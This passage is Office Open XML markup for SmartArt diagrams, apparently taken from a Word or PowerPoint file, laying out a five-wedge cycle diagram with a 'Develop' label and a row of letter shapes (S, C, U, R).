          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4382EF0A-3ADF-4BA7-86EC-DF748FA385D3}">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Develop</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7E74235-268A-4286-A2C5-F8ED089E8588}" type="parTrans" cxnId="{55CA2D04-A368-4974-97A1-FD0FD0D04011}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1050"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C5064FA-65EA-4973-BBC0-9CE3E1D53C45}" type="sibTrans" cxnId="{55CA2D04-A368-4974-97A1-FD0FD0D04011}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1050"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="compositeShape" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E9DE3F36-1887-442A-B31A-A46474B10E39}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="wedge1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5" custScaleX="93947" custScaleY="100449"/>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="853316" y="277620"/>
          <a:ext cx="3594099" cy="3842844"/>
        </a:xfrm>
        <a:prstGeom prst="pie">
          <a:avLst>
            <a:gd name="adj1" fmla="val 16200000"/>
            <a:gd name="adj2" fmla="val 20520000"/>
          </a:avLst>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{9F0489F9-DB65-4313-8BFB-80523E5581BA}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="dummy1a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{55AE7CCB-1F33-4E29-BC0D-8ABC836E3F32}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="dummy1b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EC56FC4-F161-4459-A50D-5A30B91DE51E}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="wedge1Tx" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2337B3F5-006B-4719-B3E7-D6CA690AE7F0}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="wedge2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="770324" y="388227"/>
          <a:ext cx="3825667" cy="3825667"/>
        </a:xfrm>
        <a:prstGeom prst="pie">
          <a:avLst>
            <a:gd name="adj1" fmla="val 20520000"/>
            <a:gd name="adj2" fmla="val 3240000"/>
          </a:avLst>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{C7298A9D-9C9D-4B28-82B4-7C1A08AD4229}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="dummy2a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1BC922AE-2367-4610-84A9-B817FA6F0931}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="dummy2b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{214C0C1C-A01C-42FB-89BA-5F1F4807801C}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="wedge2Tx" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5A93784E-5A55-4F7F-B894-CC7508A7AA83}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="wedge3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="683791" y="451077"/>
          <a:ext cx="3825667" cy="3825667"/>
        </a:xfrm>
        <a:prstGeom prst="pie">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3240000"/>
            <a:gd name="adj2" fmla="val 7560000"/>
          </a:avLst>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{32277176-ED9E-487E-9CDA-375AE6AECB97}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="dummy3a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{489DE919-24C6-4165-8C9B-F046203D2F7A}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="dummy3b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{10F638D0-42F3-4995-993D-185287EFE2E1}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="wedge3Tx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{89DA5D83-6877-43D4-BD49-F525F39971A0}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="wedge4" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="597258" y="388227"/>
          <a:ext cx="3825667" cy="3825667"/>
        </a:xfrm>
        <a:prstGeom prst="pie">
          <a:avLst>
            <a:gd name="adj1" fmla="val 7560000"/>
            <a:gd name="adj2" fmla="val 11880000"/>
          </a:avLst>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{E6E7AD05-D925-4548-9BBA-8C1F7ABF7F2D}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="dummy4a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D7DF358C-4535-48C0-B166-3E718A3E8CBB}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="dummy4b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DC9D5E6F-7E95-49B0-84CB-30BC9AE754AB}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="wedge4Tx" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DE63C1DB-C0F6-4706-89B6-B693A3C7F9A4}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="wedge5" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="630049" y="286209"/>
          <a:ext cx="3825667" cy="3825667"/>
        </a:xfrm>
        <a:prstGeom prst="pie">
          <a:avLst>
            <a:gd name="adj1" fmla="val 11880000"/>
            <a:gd name="adj2" fmla="val 16200000"/>
          </a:avLst>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{F345DC6A-13E7-4632-9BD5-EC0ADA5D2ACB}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="dummy5a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB23288E-7B4E-4F0E-AE48-A0B82AC90C90}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="dummy5b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E08F28E4-A57F-40BA-8C9F-B3E38EF2E668}" type="pres">
      <dgm:prSet presAssocID="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" presName="wedge5Tx" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2178449E-D2C0-4223-8890-03515FA83295}" type="pres">
      <dgm:prSet presAssocID="{8409C2F4-8F4D-4214-9242-83C3B76FC33D}" presName="arrowWedge1" presStyleLbl="fgSibTrans2D1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{55232D65-456A-403B-924B-1B38CC37469F}" type="pres">
      <dgm:prSet presAssocID="{1C5064FA-65EA-4973-BBC0-9CE3E1D53C45}" presName="arrowWedge2" presStyleLbl="fgSibTrans2D1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{FE48437E-7ED3-4CD8-9D6B-C5EB53A03A25}" type="pres">
      <dgm:prSet presAssocID="{5CDB8A2C-88C1-4342-B602-DFE2BCA975CD}" presName="arrowWedge3" presStyleLbl="fgSibTrans2D1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{800B4ADC-3CA4-4049-AD19-A86AD9980E1E}" type="pres">
      <dgm:prSet presAssocID="{D6BE2CDB-F308-480C-9096-1AA35E8EB69A}" presName="arrowWedge4" presStyleLbl="fgSibTrans2D1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{A16AB8F6-71CB-4200-B83D-7F0036C644BD}" type="pres">
      <dgm:prSet presAssocID="{423ECCEF-0BA8-492D-84E5-DBF04D86F48F}" presName="arrowWedge5" presStyleLbl="fgSibTrans2D1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="65000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F6B79A02-CE6B-4ED3-BD0A-06267E85DB49}" type="presOf" srcId="{3E04B106-F654-4928-8E1C-A39D79953DB0}" destId="{E9DE3F36-1887-442A-B31A-A46474B10E39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{55CA2D04-A368-4974-97A1-FD0FD0D04011}" srcId="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" destId="{4382EF0A-3ADF-4BA7-86EC-DF748FA385D3}" srcOrd="1" destOrd="0" parTransId="{C7E74235-268A-4286-A2C5-F8ED089E8588}" sibTransId="{1C5064FA-65EA-4973-BBC0-9CE3E1D53C45}"/>
    <dgm:cxn modelId="{81824D1A-FDA6-4B55-B505-EF59BE89804C}" type="presOf" srcId="{0FBD757F-E850-4732-A0D3-5E753691A047}" destId="{5A93784E-5A55-4F7F-B894-CC7508A7AA83}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{06407A1A-9493-4C31-A1DC-02A8E0FB8DC2}" type="presOf" srcId="{A6AE4B08-4431-4AD5-A470-E7900079FEB5}" destId="{89DA5D83-6877-43D4-BD49-F525F39971A0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{A8188928-B2BB-47C4-B0D1-1B19507E6955}" srcId="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" destId="{9B17CFF9-D381-4461-B3FD-5FD68CDACBFD}" srcOrd="4" destOrd="0" parTransId="{0C2FDB92-8ACC-464B-A21F-657EA1A0B01C}" sibTransId="{423ECCEF-0BA8-492D-84E5-DBF04D86F48F}"/>
    <dgm:cxn modelId="{1A98752B-4E9C-4E1D-9769-3FFC90035B7B}" type="presOf" srcId="{9B17CFF9-D381-4461-B3FD-5FD68CDACBFD}" destId="{DE63C1DB-C0F6-4706-89B6-B693A3C7F9A4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{3DA8CF2C-2B6B-4975-910D-3ACCE3899854}" srcId="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" destId="{A6AE4B08-4431-4AD5-A470-E7900079FEB5}" srcOrd="3" destOrd="0" parTransId="{E644018F-FDB6-4B9D-B63A-96500497AE01}" sibTransId="{D6BE2CDB-F308-480C-9096-1AA35E8EB69A}"/>
    <dgm:cxn modelId="{00928969-2C7A-4659-BF88-D961E77B7DAB}" type="presOf" srcId="{0FBD757F-E850-4732-A0D3-5E753691A047}" destId="{10F638D0-42F3-4995-993D-185287EFE2E1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{66EC0A53-D1ED-4CB3-B7D0-B935D5D20209}" type="presOf" srcId="{9B17CFF9-D381-4461-B3FD-5FD68CDACBFD}" destId="{E08F28E4-A57F-40BA-8C9F-B3E38EF2E668}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{E145B857-3646-46F8-9792-F63D2478A0EC}" srcId="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" destId="{3E04B106-F654-4928-8E1C-A39D79953DB0}" srcOrd="0" destOrd="0" parTransId="{F72CEBF0-D2AC-4440-899F-237B682511DD}" sibTransId="{8409C2F4-8F4D-4214-9242-83C3B76FC33D}"/>
    <dgm:cxn modelId="{2A26FD85-5722-4324-8A31-A0B83F84B759}" srcId="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" destId="{0FBD757F-E850-4732-A0D3-5E753691A047}" srcOrd="2" destOrd="0" parTransId="{B2507A80-321B-4528-BD2F-EBA6593F62AF}" sibTransId="{5CDB8A2C-88C1-4342-B602-DFE2BCA975CD}"/>
    <dgm:cxn modelId="{4508628F-3E87-4F7F-856E-E02A8B25D9BA}" type="presOf" srcId="{6784893D-6F10-4985-B9F0-D2B8AE6DF98F}" destId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{AB6CC4AB-2649-4569-9157-ED536A404AD0}" type="presOf" srcId="{4382EF0A-3ADF-4BA7-86EC-DF748FA385D3}" destId="{214C0C1C-A01C-42FB-89BA-5F1F4807801C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{2649BDAF-B830-43D5-87CA-90226B6A0F7E}" type="presOf" srcId="{4382EF0A-3ADF-4BA7-86EC-DF748FA385D3}" destId="{2337B3F5-006B-4719-B3E7-D6CA690AE7F0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{360F64B9-7E96-434B-9590-C9E45EADD7D0}" type="presOf" srcId="{A6AE4B08-4431-4AD5-A470-E7900079FEB5}" destId="{DC9D5E6F-7E95-49B0-84CB-30BC9AE754AB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{F23E0BF9-A79D-49DC-BB5E-CE49932DDECE}" type="presOf" srcId="{3E04B106-F654-4928-8E1C-A39D79953DB0}" destId="{9EC56FC4-F161-4459-A50D-5A30B91DE51E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{5126D66F-B622-42E6-BE9C-89385CB6FC0F}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{E9DE3F36-1887-442A-B31A-A46474B10E39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{EC9967CD-DC8E-4565-A038-11F10CC59AFB}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{9F0489F9-DB65-4313-8BFB-80523E5581BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{C22181E0-0B16-4D87-8049-0EECCD07F6BE}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{55AE7CCB-1F33-4E29-BC0D-8ABC836E3F32}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{FC80A629-9D0F-4490-A69D-DFA878C2872C}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{9EC56FC4-F161-4459-A50D-5A30B91DE51E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{8043E32E-150E-4AF6-9732-3307C083A5EC}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{2337B3F5-006B-4719-B3E7-D6CA690AE7F0}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{091F4B9D-9306-4024-9DC8-39500B790D0D}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{C7298A9D-9C9D-4B28-82B4-7C1A08AD4229}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{D1182753-18EA-4752-BDD6-6F1ADBA04F45}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{1BC922AE-2367-4610-84A9-B817FA6F0931}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{D32D3993-47E5-49AD-9EA6-D48F1485B344}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{214C0C1C-A01C-42FB-89BA-5F1F4807801C}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{3692BE33-7616-4453-B38E-6A4946461481}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{5A93784E-5A55-4F7F-B894-CC7508A7AA83}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{0D424348-E4C8-4758-86DD-FC80E455FE85}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{32277176-ED9E-487E-9CDA-375AE6AECB97}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{D0816EB5-4ADD-47CB-A7E5-37877AAD2DFB}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{489DE919-24C6-4165-8C9B-F046203D2F7A}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{2F63DC85-AD06-4ED0-B357-031F2090D11D}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{10F638D0-42F3-4995-993D-185287EFE2E1}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{AF599E53-E600-4391-B008-19CF89807C4C}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{89DA5D83-6877-43D4-BD49-F525F39971A0}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{D8B631A0-2A9E-4BE1-BA45-28E2823348CE}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{E6E7AD05-D925-4548-9BBA-8C1F7ABF7F2D}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{6083315B-D7B1-40A7-B0D2-4C8CF868928D}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{D7DF358C-4535-48C0-B166-3E718A3E8CBB}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{EF36C103-67F3-4EA8-9410-EBAE355C74D6}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{DC9D5E6F-7E95-49B0-84CB-30BC9AE754AB}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{2B05B9BF-6387-4E8E-9721-ABB472F9004A}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{DE63C1DB-C0F6-4706-89B6-B693A3C7F9A4}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{41F63BAB-84B8-4971-B221-EFA45535B777}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{F345DC6A-13E7-4632-9BD5-EC0ADA5D2ACB}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{0C72197B-7C69-4061-BAE2-2627E9A9E84D}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{BB23288E-7B4E-4F0E-AE48-A0B82AC90C90}" srcOrd="18" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{55D3A62B-0996-4282-8EB0-F99CCE6D0C7C}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{E08F28E4-A57F-40BA-8C9F-B3E38EF2E668}" srcOrd="19" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{0C56F461-F5F1-4A7D-B1F2-533C9A7C4B6B}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{2178449E-D2C0-4223-8890-03515FA83295}" srcOrd="20" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{300155F8-47BC-46BC-A49D-A236C9DE7175}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{55232D65-456A-403B-924B-1B38CC37469F}" srcOrd="21" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{23C17D4A-15FB-4DD9-8BE0-4BC692B35AFE}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{FE48437E-7ED3-4CD8-9D6B-C5EB53A03A25}" srcOrd="22" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{324AA14B-3B90-4E02-87C2-EC6590E905B2}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{800B4ADC-3CA4-4049-AD19-A86AD9980E1E}" srcOrd="23" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/cycle8"/>
    <dgm:cxn modelId="{ECB566D5-14B6-49E5-8C37-8D8BA3A2ABBF}" type="presParOf" srcId="{BF56D52F-8BF9-4D67-8F7F-F7613283299A}" destId="{A16AB8F6-71CB-4200-B83D-7F0036C644BD}"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DD6B7-E5C1-4DC2-8205-71D397842FC2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1027" y="59798"/>
          <a:ext cx="1683803" cy="168380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92665" tIns="82550" rIns="9266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S</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="247614" y="306385"/>
        <a:ext cx="1190629" cy="1190629"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B1E63991-659F-4D2A-8923-73D16D00DC26}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1348071" y="59798"/>
          <a:ext cx="1683803" cy="168380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92665" tIns="82550" rIns="9266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a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1594658" y="306385"/>
        <a:ext cx="1190629" cy="1190629"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6390F78C-2315-4234-8AD1-FCAD6E2E0040}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2695114" y="59798"/>
          <a:ext cx="1683803" cy="168380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92665" tIns="82550" rIns="9266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C</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2941701" y="306385"/>
        <a:ext cx="1190629" cy="1190629"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{209E93DE-584F-44D4-A3C7-54FFA34A4F70}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4042157" y="59798"/>
          <a:ext cx="1683803" cy="168380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92665" tIns="82550" rIns="9266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U</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4288744" y="306385"/>
        <a:ext cx="1190629" cy="1190629"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FBA9B9AB-A341-4635-A8C8-F0A81EF7CB23}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5389200" y="59798"/>
          <a:ext cx="1683803" cy="168380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92665" tIns="82550" rIns="9266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R</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5635787" y="306385"/>
        <a:ext cx="1190629" cy="1190629"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29B9FA2B-3FD7-4E0C-B7C5-28012D3B15D7}">
